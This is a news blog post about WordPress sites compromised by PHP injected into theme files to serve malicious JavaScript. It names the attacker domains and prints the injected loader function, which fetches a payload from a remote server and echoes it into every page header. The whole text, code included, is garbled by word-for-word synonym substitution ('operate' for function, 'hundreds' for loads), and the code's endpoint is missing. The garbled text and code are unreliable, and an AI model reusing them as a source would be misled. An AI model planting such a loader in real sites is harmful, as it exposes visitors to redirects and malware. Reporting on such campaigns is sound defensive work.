Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Hackers Weaponizing WordPress Websites by Injecting Malicious PHP Codes Silently

Posted on October 8, 2025October 8, 2025 By CWS

WordPress web sites have change into a chief goal for menace actors searching for to monetize site visitors and compromise customer safety.

In current months, a brand new malvertising marketing campaign has emerged, leveraging silent PHP code injections inside theme information to serve undesirable third-party scripts.

The assault blends seamlessly with respectable web site operations, delivering obfuscated JavaScript that redirects guests, shows pop-ups, and evades safety instruments with out elevating suspicion.

Initially found by a web site proprietor noticing unexplained script hundreds, the intrusion originated from a small block of PHP code appended to the lively theme’s features.php file.

This injection didn’t alter seen web page content material, as an alternative executing behind the scenes on each request.

Sucuri analysts recognized the marketing campaign after detecting anomalous JavaScript calls to attacker-controlled domains and blocklisting by a number of safety distributors.

The assault primarily exploits weak file permissions and outdated themes. By gaining write entry—usually by means of compromised credentials or susceptible plugins—hackers insert a seemingly benign operate that contacts a command-and-control server.

As soon as invoked by way of the wp_head hook, the operate fetches a dynamic JavaScript payload and echoes it into the web page’s part, making certain execution earlier than the remainder of the web page hundreds.

Sucuri researchers famous that the injected operate establishes a POST connection to a distant endpoint at hxxps://brazilc[.]com/advertisements.php, retrieves the malicious script, and embeds it instantly into the HTML doc.

The payload performs two essential actions: loading a traffic-distribution script from porsasystem.com/6m9x.js and injecting a hidden 1×1 pixel iframe that mimics Cloudflare’s problem platform.

These strategies allow pressured redirects, pop-ups, and evasion of safety scanners by disguising malicious exercise as respectable CDN operations.

An infection Mechanism

The an infection mechanism hinges on the next PHP operate injected into features.php:-

// Injected PHP operate in features.php
operate ti_custom_javascript() {
$response = wp_remote_post(
‘
array(‘timeout’ => 15, ‘physique’ => array(‘url’ => home_url()))
);
if (!is_wp_error($response)) {
echo wp_remote_retrieve_body($response);
}
}
add_action(‘wp_head’, ‘ti_custom_javascript’);

Upon every web page load, this operate silently executes, contacting the C&C server and printing the returned JavaScript payload into the web page header.

Payload (Supply – Sucuri)

The attacker’s script then hundreds additional malicious code asynchronously, leveraging attributes like data-cfasync=”false” and async to bypass Cloudflare Rocket Loader.

By embedding inside a hidden iframe, the malware evades detection and resides persistently till the injected code is eliminated.

Observe us on Google Information, LinkedIn, and X to Get Extra On the spot Updates, Set CSN as a Most popular Supply in Google.

Cyber Security News Tags:Codes, Hackers, Injecting, Malicious, PHP, Silently, Weaponizing, Websites, WordPress

Post navigation

Previous Post: CISA Warns of Zimbra Collaboration Suite (ZCS) XSS Zero-Day Vulnerability Actively Exploited in Attacks
Next Post: Ransomware Group Claims Attack on Beer Giant Asahi

Related Posts

WhatsApp Desktop Users At Risk of Code Execution Attacks with Python on Windows PCs Cyber Security News
Attacks on Palo Alto PAN-OS Global Protect Login Portals Surge from 2,200 IPs Cyber Security News
Cisco Nexus 3000 and 9000 Series Vulnerability Let Attackers Trigger DoS Attack Cyber Security News
Lumma Stealer Via Fake Cracked Software Steals Login Credentials and Private Files Cyber Security News
Splunk Address Third Party Packages Vulnerabilities in Enterprise Versions Cyber Security News
Hacking Xiaomi Smartwatch Using Touch Point to Find Unlock PIN coordinates Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Google Offers Up to $20,000 in New AI Bug Bounty Program
  • Step Into the Password Graveyard… If You Dare (and Join the Live Session)
  • North Korean Hackers Have Stolen $2 Billion in Cryptocurrency in 2025
  • Severe Figma MCP Vulnerability Lets Hackers Execute Code Remotely — Patch Now
  • PoC Exploit Released for Critical Lua Engine Vulnerabilities

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Google Offers Up to $20,000 in New AI Bug Bounty Program
  • Step Into the Password Graveyard… If You Dare (and Join the Live Session)
  • North Korean Hackers Have Stolen $2 Billion in Cryptocurrency in 2025
  • Severe Figma MCP Vulnerability Lets Hackers Execute Code Remotely — Patch Now
  • PoC Exploit Released for Critical Lua Engine Vulnerabilities

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News